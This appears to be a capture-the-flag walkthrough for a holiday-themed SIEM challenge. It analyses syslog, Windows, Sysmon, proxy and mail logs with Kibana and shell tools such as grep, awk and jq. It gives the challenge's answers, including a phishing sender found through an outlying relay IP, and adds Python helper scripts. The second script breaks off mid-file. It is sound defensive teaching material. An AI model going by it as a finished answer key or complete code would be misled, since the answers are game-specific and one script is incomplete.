Introduction

Towards the top left corner of the yard I’ll find Fitzy Shortstack by a tent with a destroyed satellite dish and the Elf Stack terminal:

image-20241228074521231

Fitzy introduces the North Pole Elf Stack SIEM:

Fitzy Shortstack

Greetings! I’m the genius behind the North Pole Elf Stack SIEM. And oh boy, we’ve got a situation on our hands.

Our system was attacked—Wombley’s faction unleashed their FrostBit ransomware, and it’s caused a digital disaster.

The logs are a mess, and Wombley’s laptop—the only backup of the Naughty-Nice List—was smashed to pieces.

Now, it’s all up to you to help me trace the attack vectors and events. We need to figure out how this went down before it’s too late.

You’ll be using a containerized ELK stack or Linux CLI tools. Sounds like a fun little puzzle, doesn’t it?

Your job is to analyze these logs… think of it as tracking snow tracks but in a digital blizzard.

If you can find the attack path, maybe we can salvage what’s left and get Santa’s approval.

Santa’s furious at the faction fighting, and he’s disappointed. We have to make things right.

So, let’s show these attackers that the North Pole’s defenses are no joke!

Elf Stack - Setup

Terminal

The terminal starts with a welcome screen asking if I want to play Easy or Hard mode:

image-20241228082213843

Skipping both for now, I’ll click on Download:

image-20241228082228940

I’ll download all three files.

The “Help” button provides another overlay with instructions for the challenge. Points worth noting:

  • Easy is meant to be done entirely in the SIEM (the containerized ELK stack), whereas Hard will require additional file parsing (though I am welcome to approach the challenge however I want).
  • The instructions for the SIEM container are given here.

Container

I’ll unzip the elf-stack-siem-with-logs.zip archive and navigate into the created elf-stack-siem directory. Here I’ll run docker compose up setup. This starts the setup container:

oxdf@corum:~/Downloads/elf-stack-siem$ docker compose up setup
[+] Running 12/12
 ✔ elasticsearch Pulled                      33.0s 
 ✔ setup 10 layers [⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿]      0B/0B      Pulled    33.0s 
   ✔ bef9b66d64c1 Pull complete               3.7s 
   ✔ a809598a97cb Pull complete               2.3s 
   ✔ b1e3cab81fe0 Pull complete               1.2s 
   ✔ 4ca545ee6d5d Pull complete               2.2s 
   ✔ c5877fdff53b Pull complete              25.0s 
   ✔ 0db2217c4e96 Pull complete               3.3s 
   ✔ a26d7e8c9bed Pull complete               4.3s 
   ✔ e8e978c35e48 Pull complete               5.0s 
   ✔ 6cf397f5af60 Pull complete               5.3s 
   ✔ 086a059acc9c Pull complete               6.2s 
[+] Running 5/5
 ✔ Network elf_net                   Created  0.1s 
 ✔ Volume "ess_elastisearch_data"    Created  0.0s 
 ✔ Volume "ess_logstash_queue_data"  Created  0.0s 
 ✔ Container ess_elasticsearch       Created  0.5s 
 ✔ Container ess_setup               Created  0.0s 
Attaching to ess_setup
ess_setup  | [+] Waiting for availability of Elasticsearch. This can take several minutes.
ess_setup  |    ⠿ Elasticsearch is running
ess_setup  | [+] Waiting for initialization of built-in users
ess_setup  |    ⠿ Built-in users were initialized
ess_setup  | [+] Role 'heartbeat_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] Role 'metricbeat_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] Role 'filebeat_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] Role 'logstash_writer'
ess_setup  |    ⠿ Creating/updating
ess_setup  | [+] User 'filebeat_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'kibana_system'
ess_setup  |    ⠿ User exists, setting password
ess_setup  | [+] User 'logstash_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'heartbeat_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'metricbeat_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'monitoring_internal'
ess_setup  |    ⠿ User does not exist, creating
ess_setup  | [+] User 'beats_system'
ess_setup  |    ⠿ User exists, setting password
ess_setup exited with code 0 

Once it’s done, I’ll wait 60 seconds, and then run docker compose up to start the rest of the containers defined in docker-compose.yml. This can take up to 30 minutes, but it was faster on my machine. When it’s complete, it shows a message with the login information:

image-20241228083213510

Elastic

Visiting http://localhost:5601 offers the Kibana login screen (Kibana is the web UI in front of Elasticsearch):

image-20241228083346494

On giving the creds, it returns the home screen. To find the data, I’ll click “Discover” from the menu on the left side:

image-20241228083455576

The initial view shows no data because the timeframe (Last 15 minutes by default) doesn’t show the event to be investigated. I’ll update that to a wide timeframe, and then zoom in to see that all the data is from September 15 and 16 2024:

image-20241228083725793

Logs

The log data can be examined without the SIEM, using only Bash commands in a Linux terminal. There are two large files:

oxdf@hacky$ du -h log_chunk_*.log
1.7G	log_chunk_1.log
1.8G	log_chunk_2.log

log_chunk_1.log starts and ends on 2024-09-15:

oxdf@hacky$ head -1 log_chunk_1.log
<134>1 2024-09-15T00:10:01-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T03:10:01.304953-04:00", "hostname": "kringleSSleigH", "service": "CRON[4863]:", "message": "pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)"}
oxdf@hacky$ tail -1 log_chunk_1.log
<134>1 2024-09-15T10:58:59-04:00 VirtualStation.northpole.local WindowsEvent - - - {"EventTime": "2024-09-15 10:58:59", "Hostname": "VirtualStation.northpole.local", "Keywords": -9218868437227405312, "EventType": "AUDIT_FAILURE", "SeverityValue": 4, "Severity": "ERROR", "EventID": 4673, "SourceName": "Microsoft-Windows-Security-Auditing", "ProviderGuid": "{54849625-5478-4994-A5BA-3E3B0328C30D}", "Version": 0, "Task": 13056, "OpcodeValue": 0, "RecordNumber": 949076, "ProcessID": 4, "ThreadID": 8048, "Channel": "Security", "Category": "Sensitive Privilege Use", "Opcode": "Info", "SubjectUserSid": "S-1-5-21-3699322559-1991583901-1175093138-1109", "SubjectUserName": "elf_user01", "SubjectDomainName": "NORTHPOLE", "SubjectLogonId": "0x13c46de", "ObjectServer": "Security", "Service": "-", "PrivilegeList": "SeProfileSingleProcessPrivilege", "ProcessName": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "EventReceivedTime": "2024-09-15T10:58:59-04:00", "SourceModuleName": "inSecurityEvent", "SourceModuleType": "im_msvistalog", "Subject_SecurityID": "S-1-5-21-3699322559-1991583901-1175093138-1109", "Subject_AccountName": "elf_user01", "Subject_AccountDomain": "NORTHPOLE", "Subject_LogonID": "0x13C46DE", "Service_Server": "Security", "Service_ServiceName": "-", "Process_ProcessID": "0xb34", "Process_ProcessName": "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "ServiceRequestInformation_Privileges": "SeProfileSingleProcessPrivilege", "MoreDetails": "A privileged service was called."}
oxdf@hacky$ cat log_chunk_1.log | cut -d' ' -f2 | cut -dT -f1 | sort -u
2024-09-15

log_chunk_2.log is all on 2024-09-16:

oxdf@hacky$ cat log_chunk_2.log | cut -d' ' -f2 | cut -dT -f1 | sort -u
2024-09-16

Each line is an RFC 5424 syslog record, space separated as "<PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID STRUCTURED-DATA MSG". The APP-NAME is the event_source, the three "-" are the nil values for PROCID, MSGID and STRUCTURED-DATA, and the message is the JSON data. "<134>1" is PRI 134 (facility 16, local0, severity 6, informational) with syslog version 1. For example:

<134>1 2024-09-15T00:10:01-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T03:10:01.304953-04:00", "hostname": "kringleSSleigH", "service": "CRON[4863]:", "message": "pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)"}

When working directly with these files, commands like jq can be very slow, whereas commands like grep are pretty fast. There are two things I’ll show that help with speed:

  • When I’m going to use jq to select a bunch of logs, I’ll often grep before that. grep will find lines containing some value much faster, and then jq will keep only the lines that have that value in a specific field.
  • I’ll make smaller files (i.e., all of the AuthLog source) to query out of.

For example, here are both at once, using awk to select lines based on the event_source (the fourth space-separated field):

oxdf@hacky$ time cat log_chunk_*.log | awk '$4 == "AuthLog"' > AuthLog.log

real	0m6.392s
user	0m4.030s
sys	0m1.621s
oxdf@hacky$ time cat log_chunk_*.log | grep AuthLog | awk '$4 == "AuthLog"' > AuthLog.log

real	0m2.501s
user	0m0.876s
sys	0m1.968s

The grep cuts the time to less than half, and awk is much faster than jq.
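The same pipeline in Python, as an added example that is not part of the original writeup or the challenge's tooling: it decodes the syslog PRI, pulls the header fields apart, parses the JSON payload, and applies the cheap substring test before the expensive parse, exactly like the grep-then-awk pattern above. The first two sample lines are copied from the formats shown on this page; the third is a constructed decoy whose payload merely mentions "AuthLog" (to show why the header-field check is still needed after grep) and the fourth is constructed junk. The function names are my own.

```python
"""Parse Elf Stack log lines (RFC 5424 syslog header + JSON payload).

Added example for this writeup, not the challenge's own tooling. Sample lines
1 and 2 are copied from the page; lines 3 and 4 are constructed.
"""
import json
import re
from collections import Counter, defaultdict

# <PRI>VERSION TIMESTAMP HOSTNAME APP-NAME PROCID MSGID STRUCTURED-DATA MSG
# Assumes STRUCTURED-DATA is always the nil value "-", as it is in these logs
# (a real SD element contains spaces and would need a bracket-aware parser).
HEADER = re.compile(
    r"^<(?P<pri>\d{1,3})>(?P<version>\d+) (?P<ts>\S+) (?P<host>\S+) "
    r"(?P<source>\S+) (?P<procid>\S+) (?P<msgid>\S+) (?P<sd>\S+) (?P<msg>.*)$"
)

SAMPLE_LINES = [
    # AuthLog line as shown in the writeup
    '<134>1 2024-09-15T00:10:01-04:00 kringleSSleigH AuthLog - - - {"timestamp": "2024-09-15T03:10:01.304953-04:00", "hostname": "kringleSSleigH", "service": "CRON[4863]:", "message": "pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)"}',
    # GreenCoat line as shown in the writeup
    '<134>1 2024-09-15T05:57:55-04:00 SecureElfGwy GreenCoat - - - {"ip": "172.24.25.93", "user_identifier": "elf_user03", "timestamp": "2024-09-15T05:57:55-04:00", "method": "CONNECT", "url": "disc601.prod.do.dsp.mp.microsoft.com:443", "http_protocol": "HTTP/1.1", "status_code": 200, "response_size": 0, "protocol": "HTTPS", "additional_info": "outgoing via 172.24.25.25", "host": "SnowSentry"}',
    # Constructed decoy: a mail event whose payload mentions "AuthLog"; grep alone matches it
    '<134>1 2024-09-15T08:26:14-04:00 SecureElfGwy SnowGlowMailPxy - - - {"From": "elf_user00@northpole.local", "To": "asnowball04@northpole.local", "Subject": "AuthLog review", "Body": "Please check the AuthLog today.", "ReceivedIP1": "172.24.25.25", "ReceivedIP2": "172.24.25.20"}',
    # Constructed: not in the expected format at all
    "garbage line",
]


def parse_line(line):
    """Return the header fields plus the decoded JSON payload, or None."""
    m = HEADER.match(line.rstrip("\n"))
    if not m:
        return None
    pri = int(m["pri"])
    try:
        event = json.loads(m["msg"])
    except json.JSONDecodeError:
        event = None
    return {
        "facility": pri >> 3,    # 134 >> 3 == 16 (local0)
        "severity": pri & 7,     # 134 & 7 == 6 (informational)
        "timestamp": m["ts"],
        "hostname": m["host"],   # syslog HOSTNAME, the field the GreenCoat question asks about
        "event_source": m["source"],
        "event": event,
    }


def iter_source(lines, source):
    """Yield parsed records whose APP-NAME equals `source`.

    Mirrors `grep SOURCE | awk '$4 == "SOURCE"'`: the substring test rejects
    most lines before any regex/JSON work, and the header-field test rejects
    lines that only mention the source somewhere inside the payload.
    """
    for line in lines:
        if source not in line:
            continue
        rec = parse_line(line)
        if rec and rec["event_source"] == source:
            yield rec


def count_sources(lines):
    """Equivalent of: cut -d' ' -f4 | sort | uniq -c."""
    return Counter(r["event_source"] for r in map(parse_line, lines) if r)


def split_by_source(lines):
    """Bucket parsed records by event_source, like writing the per-source files."""
    buckets = defaultdict(list)
    for rec in map(parse_line, lines):
        if rec:
            buckets[rec["event_source"]].append(rec)
    return dict(buckets)


if __name__ == "__main__":
    for source, n in count_sources(SAMPLE_LINES).most_common():
        print(f"{n:8d} {source}")
```

Run against the real files, split_by_source would hold every record in memory; for the 3.5 GB here, iter_source with a single target and streaming the file is the right shape, which is exactly why the per-source files are worth making once.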

Process IDs

There’s an oddity in the event logs when it comes to Sysmon Process IDs. It is possible that there’s a legit reason for it, but everything I’ve researched suggests that the data was just mangled on import. This can happen when designing a CTF, or in the real world!

For example, here’s a Sysmon Process Create log (WindowsEvent.log is the per-source file created below in Question 11):

oxdf@hacky$ cat WindowsEvent.log | grep "Process Create:" | cut -d' ' -f8- | head -1 | jq .
{
  "EventTime": "2024-09-15 05:01:52",
  "Hostname": "SecureElfGwy.northpole.local",
  "Keywords": -9223372036854775808,
  "EventType": "INFO",
  "SeverityValue": 2,
  "Severity": "INFO",
  "EventID": 1,
  "SourceName": "Microsoft-Windows-Sysmon",
  "ProviderGuid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
  "Version": 5,
  "Task": 1,
  "OpcodeValue": 0,
  "RecordNumber": 440,
  "ProcessID": 8640,
  "ThreadID": 6872,
  "Channel": "Microsoft-Windows-Sysmon/Operational",
  "Domain": "NT AUTHORITY",
  "AccountName": "SYSTEM",
  "UserID": "S-1-5-18",
  "AccountType": "User",
  "Category": "Process Create (rule: ProcessCreate)",
  "Opcode": "Info",
  "RuleName": "-",
  "UtcTime": "2024-09-15T05:01:52-04:00",
  "ProcessGuid": "{face0b26-f3b0-660b-7c08-000000000900}",
  "Image": "C:\\Program Files\\nxlog\\nxlog.exe",
  "FileVersion": "-",
  "Description": "-",
  "Product": "-",
  "Company": "-",
  "OriginalFileName": "-",
  "CommandLine": "\"C:\\Program Files\\nxlog\\nxlog.exe\" -c \"C:\\Program Files\\nxlog\\conf\\nxlog.conf\"",
  "CurrentDirectory": "C:\\Windows\\system32\\",
  "User": "NT AUTHORITY\\SYSTEM",
  "LogonGuid": "{face0b26-bc81-6606-e703-000000000000}",
  "LogonId": "0x3e7",
  "TerminalSessionId": 0,
  "IntegrityLevel": "System",
  "Hashes": "MD5=D2BF1F3178E70677C11C52950A12D744,SHA256=172455FF28DF99E2CAEFFFB92AD908749DACE7593EC8B94760EA4F163F746D76,IMPHASH=4FAC2CA02E73F0E9CA12C3333E24B4BD",
  "ParentProcessGuid": "{face0b26-bc80-6606-0a00-000000000900}",
  "ParentProcessId": 660,
  "ParentImage": "C:\\Windows\\System32\\services.exe",
  "ParentCommandLine": "C:\\Windows\\system32\\services.exe",
  "ParentUser": "NT AUTHORITY\\SYSTEM",
  "EventReceivedTime": "2024-09-15T05:01:52-04:00",
  "SourceModuleName": "inSysmon",
  "SourceModuleType": "im_msvistalog",
  "ProcessId": 8292,
  "MoreDetails": "Process Create:"
}

I’ll note ProcessID and ProcessId with different values! If I look at these logs from a single host, the ProcessID is the same for all of them:

oxdf@hacky$ cat WindowsEvent.log | grep "Process Create:" | cut -d' ' -f8- | jq -r '. | select(.EventID == 1 and .Hostname == "SleighRider.northpole.local") | "[\(.EventTime): \(.ProcessID) \(.ProcessId) \(.ParentProcessId)] \(.CommandLine)"' | head
[2024-09-15 05:31:55: 10014 49032 628] "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\Program Files\reinEDr\reinEDr\reinEDr.ps1"
[2024-09-15 05:31:55: 10014 3084 628] "C:\Program Files\nxlog\nxlog.exe" -c "C:\Program Files\nxlog\conf\nxlog.conf"
[2024-09-15 05:34:24: 10014 7408 628] C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
[2024-09-15 05:37:02: 10014 6520 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 05:37:02: 10014 6248 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 05:37:02: 10014 5176 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 05:43:18: 10014 6960 772] C:\Windows\System32\mousocoreworker.exe -Embedding
[2024-09-15 05:43:18: 10014 1432 628] C:\Windows\servicing\TrustedInstaller.exe
[2024-09-15 05:43:18: 10014 2696 772] C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.4163_none_7e304ec47c735f2e\TiWorker.exe -Embedding
[2024-09-15 05:43:32: 10014 440 628] "C:\Program Files\nxlog\nxlog.exe" -c "C:\Program Files\nxlog\conf\nxlog.conf"

My initial instinct was to use the ProcessId, as it seems to be unique to the actual process. But this fails in some cases when pivoting to non-Sysmon events, as they reference the ProcessID.

This was a bit of a mess to work through, but didn’t make the challenge unsolvable. I just needed to keep in mind that these two IDs were present and pivot off both.

Silver / Easy Mode

Questions 1-5

Question 1

How many unique values are there for the event_source field in all logs?

Clicking on event_source in the “Available fields” panel on the left shows a sample of different top values:

image-20241228084249140

This is based on only 5,000 of over 2.3 million documents. Clicking “Visualize” loads a bar graph with more:

image-20241228084350251

The graph is currently set on “Top 5 values of event_source”:

image-20241228084418826

Clicking that will allow me to add more, but no new bars appear, as there are only 5.

From Bash, I’ll use cut to get the source and then uniq -c to get counts:

oxdf@hacky$ cat log_chunk_*.log | cut -d' ' -f4 | sort | uniq -c | sort -nr
2299324 WindowsEvent
  34679 NetflowPmacct
   7476 GreenCoat
   1398 SnowGlowMailPxy
    269 AuthLog

Answer: 5

Question 2

Which event_source has the fewest number of events related to it?

The chart and terminal output from Question 1 shows the lowest is AuthLog.

Answer: AuthLog

Question 3

Using the event_source from the previous question as a filter, what is the field name that contains the name of the system the log event originated from?

To filter on event_source of “AuthLog”, I’ll add event_source: AuthLog in the bar at the top:

image-20241228084919244

The double arrows expand button will open one of these logs in a side panel:

image-20241228114504382

event.hostname and hostname both hold the hostname the event came from.

On the command line, head -1 will give one example log, and then cut can get just the JSON data so it can be processed by jq:

oxdf@hacky$ cat AuthLog.log | head -1 | cut -d' ' -f8- | jq .
{
  "timestamp": "2024-09-15T03:10:01.304953-04:00",
  "hostname": "kringleSSleigH",
  "service": "CRON[4863]:",
  "message": "pam_unix(cron:session): session opened for user root(uid=0) by (uid=0)"
}

Answer: hostname (or event.hostname)

Question 4

Which event_source has the second highest number of events related to it?

The chart and output from Question 1 show it is NetflowPmacct.

Answer: NetflowPmacct

Question 5

Using the event_source from the previous question as a filter, what is the name of the field that defines the destination port of the Netflow logs?

I’ll add the KQL to filter on this source, event_source: "NetflowPmacct", and expand one of the logs. Filtering on the string “port” shows two fields:

image-20241228114929242

On command line, the same process as Question 3 works:

oxdf@hacky$ cat NetflowPmacct.log | head -1 | cut -d' ' -f8- | jq .
{
  "event_type": "purge",
  "ip_src": "172.24.25.93",
  "ip_dst": "172.24.25.25",
  "port_src": 29994,
  "port_dst": 808,
  "ip_proto": "tcp",
  "timestamp_start": "2024-09-15T10:37:43-04:00",
  "timestamp_end": "0000-00-00T00:00:00-00:00",
  "packets": 1,
  "bytes": 40,
  "src_host": "SnowSentry.northpole.local",
  "dst_host": ""
}

Answer: port_dst (or event.port_dst)

Questions 6-10

Question 6

Which event_source is related to email traffic?

Looking at the five event source types, only one has “mail” in it.

Answer: SnowGlowMailPxy

Question 7

Looking at the event source from the last question, what is the name of the field that contains the actual email text?

The KQL event_source: "SnowGlowMailPxy" filters to this event type, where I can look at an example log.

image-20241228115306196

event.Body has the message.

From command line, it’s the same as Questions 3 and 5:

oxdf@hacky$ cat log_chunk_*.log | grep SnowGlowMailPxy | awk '$4 == "SnowGlowMailPxy"' > SnowGlowMailPxy.log
oxdf@hacky$ cat SnowGlowMailPxy.log | head -1 | cut -d' ' -f8- | jq .
{
  "From": "elf_user00@northpole.local",
  "To": "asnowball04@northpole.local",
  "Subject": "Welcome to the North Pole!",
  "Date": null,
  "Message-ID": "<532A9346-9F5F-4C29-BD40-CA171DD0E7DE@SecureElfGwy.northpole.local>",
  "Return-Path": "elf_user00@northpole.local",
  "Body": "Dear asnowball04,\n\nI wanted to inform you that we have a new team member joining us, [New Hire]. They will be joining our department as [Job Title]. Please extend a warm welcome and assist them with any necessary introductions and onboarding processes.\n\nLooking forward to working together!\n\nBest regards,\nelf_user00\n",
  "Received_Time": "2024-09-15T08:26:14-04:00",
  "ReceivedIP1": "172.24.25.25",
  "ReceivedIP2": "172.24.25.20"
}

Answer: Body (or event.Body)

Question 8

Using the ‘GreenCoat’ event_source, what is the only value in the hostname field?

I’ll use KQL to filter on GreenCoat (event_source: "GreenCoat" ), and then filter the “Available fields” on “hostname”:

image-20241228115454084

Those fields are from all of the logs, not just the filtered ones, so most of them show no results when clicked on. For example:

image-20241228115536103

The last one does:

image-20241228115554593

I could also just expand out any of the logs and filter for hostname in the fields:

image-20241228115619123

From the terminal, I’ll isolate the GreenCoat logs, and look at the fields:

oxdf@hacky$ cat log_chunk_*.log | grep GreenCoat | awk '$4 == "GreenCoat"' > GreenCoat.log

There is no hostname field in the event JSON. That field comes from the syslog header before the JSON: the HOSTNAME value that sits just before the event_source:

oxdf@hacky$ cat GreenCoat.log | head -1
<134>1 2024-09-15T05:57:55-04:00 SecureElfGwy GreenCoat - - - {"ip": "172.24.25.93", "user_identifier": "elf_user03", "timestamp": "2024-09-15T05:57:55-04:00", "method": "CONNECT", "url": "disc601.prod.do.dsp.mp.microsoft.com:443", "http_protocol": "HTTP/1.1", "status_code": 200, "response_size": 0, "protocol": "HTTPS", "additional_info": "outgoing via 172.24.25.25", "host": "SnowSentry"}

I’ll get that with cut on space getting the third item, and use sort -u to get unique entries:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f3 | sort -u
SecureElfGwy

Answer: SecureElfGwy

Question 9

Using the ‘GreenCoat’ event_source, what is the name of the field that contains the site visited by a client in the network?

Looking at the fields in an example log, event.url has the URL visited:

image-20241228115757745

An example raw log shows this as well:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | head -1 | jq .
{
  "ip": "172.24.25.93",
  "user_identifier": "elf_user03",
  "timestamp": "2024-09-15T05:57:55-04:00",
  "method": "CONNECT",
  "url": "disc601.prod.do.dsp.mp.microsoft.com:443",
  "http_protocol": "HTTP/1.1",
  "status_code": 200,
  "response_size": 0,
  "protocol": "HTTPS",
  "additional_info": "outgoing via 172.24.25.25",
  "host": "SnowSentry"
}

Answer: url (or event.url)

Question 10

Using the ‘GreenCoat’ event_source, which unique URL and port (URL:port) did clients in the TinselStream network visit most?

I’ll filter on “url” in the “Available fields” and click “Visualize”. At first, the “Other” field dwarfs all the others. I’ll turn that off in the options:

image-20241228115941004

The resulting graph shows the top five values:

image-20241228120004003

I’ll use sort, uniq, and head to get the top five most visited urls:

oxdf@hacky$ cat GreenCoat.log | cut -d' ' -f8- | jq -r '.url' | sort | uniq -c | sort -nr | head -5
    150 pagead2.googlesyndication.com:443
    105 ib.adnxs.com:443
     98 securepubads.g.doubleclick.net:443
     82 cdn.cookielaw.org:443
     80 cm.g.doubleclick.net:443

Answer: pagead2.googlesyndication.com:443

Questions 11-15

Question 11

Using the ‘WindowsEvent’ event_source, how many unique Channels is the SIEM receiving Windows event logs from?

Just like previously, I’ll use KQL to filter on WindowsEvent sources, and then use the available fields to find the event.Channel field. I’ll visualize that, and up the count to top 10, but still only five show up:

image-20241228120219080

In the raw logs, I’ll get them into a file:

oxdf@hacky$ cat log_chunk_*.log | grep WindowsEvent | awk '$4 == "WindowsEvent"' > WindowsEvent.log

An example event shows there is a Channel field:

oxdf@hacky$ cat WindowsEvent.log | head -1 | cut -d' ' -f8- | jq .
{
  "Provider_Name": "Microsoft-Windows-PowerShell",
  "Provider_Guid": "{a0c1853b-5c40-4b15-8766-3cf1c58f985a}",
  "EventID": 40962,
  "Version": 1,
  "Level": 4,
  "Task": 4,
  "Opcode": 2,
  "Keywords": "0x0",
  "TimeCreated_SystemTime": "2024-09-15T00:10:01.000000Z",
  "EventRecordID": 61068,
  "Correlation_ActivityID": "{aead5189-c9cf-46b6-bf16-0e6721070de3}",
  "ParentProcessID": 2638,
  "ThreadID": 9868,
  "Channel": "Microsoft-Windows-PowerShell/Operational",
  "Computer": "SleighRider.northpole.local",
  "Security_UserID": "S-1-5-21-3699322559-1991583901-1175093138-1111"
}

jq can give the channel value, and then sort | uniq -c will count each one to show there are five (ignoring null):

oxdf@hacky$ cat WindowsEvent.log | cut -d' ' -f8- | jq -r '.Channel' | sort | uniq -c | sort -nr
2268402 Security
  17713 Microsoft-Windows-Sysmon/Operational
  11751 Microsoft-Windows-PowerShell/Operational
   1217 null
    191 System
     50 Windows PowerShell

Answer: 5

Question 12

What is the name of the event.Channel (or Channel) with the second highest number of events?

Looking at the chart and output above, clearly Security is the most. The third bar is overwriting the second, but hovering over it shows the result:

image-20241228120356024

Answer: Microsoft-Windows-Sysmon/Operational

Question 13

Our environment is using Sysmon to track many different events on Windows systems. What is the Sysmon Event ID related to loading of a driver?

This is the kind of thing that can be looked up on a site like Ultimate IT Security.

Answer: 6

Question 14

What is the Windows event ID that is recorded when a new service is installed on a system?

This one can be looked up as well, here.

Answer: 4697

Question 15

Using the WindowsEvent event_source as your initial filter, how many user accounts were created?

This is tricky. The event log for the creation of a new user account is Security Log Event ID 4720. I’ll use KQL to filter to those, but there are no results:

image-20241228143345614

I’ll check my syntax by finding an event ID that does exist and using the same KQL with that, and it works. So the answer is just zero.

From the command line, I’ll write a jq query to output the events with ID 4697 (the ID from the previous question) one per line (-c) and see there are 15:

oxdf@hacky$ cat WindowsEvent.log | grep 4697 | cut -d' ' -f8- | jq -c '. | select(.EventID == 4697)' | wc -l
15

For this question, it should be 4720, and there are none:

oxdf@hacky$ cat WindowsEvent.log | grep 4720 | cut -d' ' -f8- | jq -c '. | select(.EventID == 4720)' | wc -l
0

This is another example of where the extra grep really helps. Without it, the query takes over 30 seconds, but with it only 2 seconds!

Answer: 0

After submitting, I’ve completed Silver:

image-20241228143057863

Fitzy

On solving Silver, Fitzy is pleased:

Fitzy Shortstack

Fantastic job! You worked through the logs using the ELK stack like a pro—efficient, quick, and spot-on. Maybe, just maybe, this will turn Santa’s frown upside down!

Up for the real challenge? Take a deep dive into those logs and query your way through the chaos. It might be tricky, but I know your adaptable skills will crack it!

Gold / Hard Mode

Questions 1-5

Question 1

What is the event.EventID number for Sysmon event logs relating to process creation?

Sysmon Event ID 1 is Process creation.

Answer: 1

Question 2

How many unique values are there for the ‘event_source’ field in all of the logs?

This is the same as Question 1 Easy.

Answer: 5

Question 3

What is the event_source name that contains the email logs?

This is pretty much the same question as Question 6 Easy.

Answer: SnowGlowMailPxy

Question 4

The North Pole network was compromised recently through a sophisticated phishing attack sent to one of our elves. The attacker found a way to bypass the middleware that prevented phishing emails from getting to North Pole elves. As a result, one of the Received IPs will likely be different from what most email logs contain. Find the email log in question and submit the value in the event ‘From:’ field for this email log event.

I’ll update the KQL to filter on the mail logs, event_source: "SnowGlowMailPxy". Looking at an example log, there are three fields having to do with IP:

image-20241228144616757

There are 1,398 logs of this type, and looking at host.ip and event.ReceivedIP1, they both have one value. For example:

image-20241228144706017

event.ReceivedIP2 has an outlier:

image-20241228144732062

That outlier is a public IP, unlike the private 172.24.25.x addresses every other event has. Clicking the + next to the “0.1%” will add that filter, which is a single log:

image-20241228144809806

The event.From field is kriskring1e@northpole.local:

image-20241228144921961

From the Linux terminal, I’ll look at an example log:

oxdf@hacky$ cat SnowGlowMailPxy.log | head -1 | cut -d' ' -f8- | jq .
{
  "From": "elf_user00@northpole.local",
  "To": "asnowball04@northpole.local",
  "Subject": "Welcome to the North Pole!",
  "Date": null,
  "Message-ID": "<532A9346-9F5F-4C29-BD40-CA171DD0E7DE@SecureElfGwy.northpole.local>",
  "Return-Path": "elf_user00@northpole.local",
  "Body": "Dear asnowball04,\n\nI wanted to inform you that we have a new team member joining us, [New Hire]. They will be joining our department as [Job Title]. Please extend a warm welcome and assist them with any necessary introductions and onboarding processes.\n\nLooking forward to working together!\n\nBest regards,\nelf_user00\n",
  "Received_Time": "2024-09-15T08:26:14-04:00",
  "ReceivedIP1": "172.24.25.25",
  "ReceivedIP2": "172.24.25.20"
}

There are two ReceivedIP fields. The second one has the unusual IP:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.ReceivedIP1' | sort | uniq -c | sort -nr
   1398 172.24.25.25
oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '.ReceivedIP2' | sort | uniq -c | sort -nr
   1397 172.24.25.20
      1 34.30.110.62

I’ll filter on that:

oxdf@hacky$ cat SnowGlowMailPxy.log | cut -d' ' -f8- | jq -r '. | select(.ReceivedIP2 != "172.24.25.20") | .From'
kriskring1e@northpole.local

Answer: kriskring1e@northpole.local
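The two checks used above (a field with one dominant value, and a value that is a public rather than private address) written as reusable detection logic, as an added example that is not part of the original writeup or the challenge's tooling. The relay IPs and the kriskring1e sender are the values shown on this page; the other senders and the number of records are constructed for illustration. It goes slightly beyond the question by also flagging unparsable IP values and by checking both Received fields with the same rule.

```python
"""Flag mail-proxy events whose ReceivedIP fields break the normal relay path.

Added example for this writeup, not the challenge's own tooling. The four
records are constructed: relay IPs and the kriskring1e sender match the page,
the remaining senders are made up.
"""
import ipaddress
from collections import Counter

MAIL = [
    {"From": "elf_user00@northpole.local", "ReceivedIP1": "172.24.25.25", "ReceivedIP2": "172.24.25.20"},
    {"From": "elf_user01@northpole.local", "ReceivedIP1": "172.24.25.25", "ReceivedIP2": "172.24.25.20"},
    {"From": "elf_user03@northpole.local", "ReceivedIP1": "172.24.25.25", "ReceivedIP2": "172.24.25.20"},
    {"From": "kriskring1e@northpole.local", "ReceivedIP1": "172.24.25.25", "ReceivedIP2": "34.30.110.62"},
]


def baseline(records, field):
    """Most common value of `field` and the share of records carrying it.

    Equivalent of: jq -r '.FIELD' | sort | uniq -c | sort -nr | head -1
    """
    counts = Counter(r.get(field) for r in records)
    value, n = counts.most_common(1)[0]
    return value, n / len(records)


def is_external(ip):
    """True for globally routable addresses. The 172.24.25.x relays in these
    logs are RFC 1918 space and return False. Unparsable values are treated
    as anomalous, since a relay field should always hold an address."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return True


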